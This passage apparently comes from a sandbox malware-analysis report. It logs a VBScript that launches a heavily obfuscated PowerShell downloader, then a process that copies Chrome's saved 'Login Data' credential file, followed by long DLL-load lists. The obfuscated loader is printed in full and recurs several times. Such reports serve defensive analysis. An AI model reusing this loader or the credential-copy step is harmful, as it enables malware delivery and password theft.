        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\birectangular.vbs"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:ShJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Concordal6.Uds && echo t"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\raserver.exe "C:\Windows\SysWOW64\raserver.exe"Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user~1\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptnet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cabinet.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: pcacli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sfc_os.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: esscli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
